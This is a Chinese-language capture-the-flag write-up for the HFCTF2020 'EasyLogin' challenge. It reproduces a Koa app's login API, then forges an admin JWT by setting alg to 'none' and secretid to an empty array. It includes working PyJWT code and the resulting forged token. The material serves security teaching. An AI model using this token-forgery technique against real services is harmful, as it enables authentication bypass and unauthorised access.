[HFCTF2020]EasyLogin -wp
![[HFCTF2020]EasyLogin -wp_第1张图片](http://img.e-com-net.com/image/info8/bff23acb9fe9443997dea7897f754e7f.jpg)
打开网页出现如上登入框,可以发现login和register等并没有php等后缀,初步判断是js框架,f12可以看到app.js
![[HFCTF2020]EasyLogin -wp_第2张图片](http://img.e-com-net.com/image/info8/3cf5700456514993bbcf93bc5ae288cd.jpg)
访问一下,提示是基于Node.js的koa框架,但是这个页面的代码并不是逻辑代码,用处不大。
在注释里提示静态文件处理出现问题,那么可能会出现任意文件读取漏洞
这里需要对koa框架的目录有一定的了解
![[HFCTF2020]EasyLogin -wp_第3张图片](http://img.e-com-net.com/image/info8/5e1c218d76474437a233816ff604a4a9.jpg)
其中controllers目录是项目控制器存放目录:接受请求,处理逻辑
访问controllers/api.js发现处理逻辑
![[HFCTF2020]EasyLogin -wp_第4张图片](http://img.e-com-net.com/image/info8/e8c305a300d74ddb8fa5d6fd32968db5.jpg)
const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')
const APIError = require('../rest').APIError;
module.exports = {
'POST /api/register': async (ctx, next) => {
const {username, password} = ctx.request.body;
if(!username || username === 'admin'){
throw new APIError('register error', 'wrong username');
}
if(global.secrets.length > 100000) {
global.secrets = [];
}
const secret = crypto.randomBytes(18).toString('hex');
const secretid = global.secrets.length;
global.secrets.push(secret)
const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});
ctx.rest({
token: token
});
await next();
},
'POST /api/login': async (ctx, next) => {
const {username, password} = ctx.request.body;
if(!username || !password) {
throw new APIError('login error', 'username or password is necessary');
}
const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;
const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;
console.log(sid)
if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
throw new APIError('login error', 'no such secret id');
}
const secret = global.secrets[sid];
const user = jwt.verify(token, secret, {algorithm: 'HS256'});
const status = username === user.username && password === user.password;
if(status) {
ctx.session.username = username;
}
ctx.rest({
status
});
await next();
},
'GET /api/flag': async (ctx, next) => {
if(ctx.session.username !== 'admin'){
throw new APIError('permission error', 'permission denied');
}
const flag = fs.readFileSync('/flag').toString();
ctx.rest({
flag
});
await next();
},
'GET /api/logout': async (ctx, next) => {
ctx.session.username = null;
ctx.rest({
status: true
})
await next();
}
};
'GET /api/flag': async (ctx, next) => {
if(ctx.session.username !== 'admin'){
throw new APIError('permission error', 'permission denied');
}
这里可以看出,如果不是admin就无法查看flag
if(!username || username === 'admin'){
throw new APIError('register error', 'wrong username');
}
又从register这里得知,无法注册admin用户
一般这种情况就是需要我们伪造admin身份登入
const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});
这是关键代码
jwt是一种身份认证的方法
jwt详解
jwt绕过方式
![[HFCTF2020]EasyLogin -wp_第5张图片](http://img.e-com-net.com/image/info8/6fbaa31d4af9471b8a4c981531059584.jpg)
在登入处抓包,发现后面跟着一大串,就是jwt
![[HFCTF2020]EasyLogin -wp_第6张图片](http://img.e-com-net.com/image/info8/27bb69a051e648bb8c0438f4502e8c2b.jpg)
利用网站https://jwt.io/
可以比较清晰的看到解码后的内容。我们只需要吧加密方式alg改为none,就相当与无加密方式了,secretid处改为[ ],然后再把用户名该为admin
用py加密一下
pip3 install PyJWT
import jwt
token = jwt.encode(
{
"secretid": [],
"username": "admin",
"password": "123456",
"iat": 1595991011
},
algorithm="none",key=""
).decode(encoding='utf-8')
print(token)
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTU5NTk5MTAxMX0.
![[HFCTF2020]EasyLogin -wp_第7张图片](http://img.e-com-net.com/image/info8/30946f2efa4e4f38a27859cd8d3a37a1.jpg)
然后把后面的参数修改一下提交
![[HFCTF2020]EasyLogin -wp_第8张图片](http://img.e-com-net.com/image/info8/8c27c4d2b95b4ba2b724feaf4d2bb19b.jpg)
就发现已经成功伪造admin登入了
再抓一次包,重发一下就可获得flag
![[HFCTF2020]EasyLogin -wp_第9张图片](http://img.e-com-net.com/image/info8/6e35a4908e604186bd438830891efde2.jpg)